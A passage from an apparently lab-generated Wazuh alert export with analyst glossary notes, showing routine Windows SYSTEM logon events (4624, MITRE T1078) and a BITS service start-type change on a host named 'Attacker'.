data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:32.965+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:32.965+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533892.154225
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:43:57.0508466Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43490
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:33.170+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.170+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.161563
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:44:30.2946918Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2922
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13636
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:33.209+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.209+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.163375
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:48:03.2396185Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43492
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:33.444+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.444+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.170713
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:16.7140388Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43494
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:33.639+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.639+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

